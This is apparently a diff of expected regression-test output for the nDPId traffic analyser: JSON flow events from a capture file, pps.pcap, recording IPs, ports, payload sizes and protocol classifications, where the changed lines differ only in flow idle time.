+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00789{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7560000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1467353136440,"flow_last_seen":1467353136952,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":12973,"flow_avg_l4_payload_len":288,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7560000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353190892,"flow_last_seen":1467353190978,"flow_idle_time":7560000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":557,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 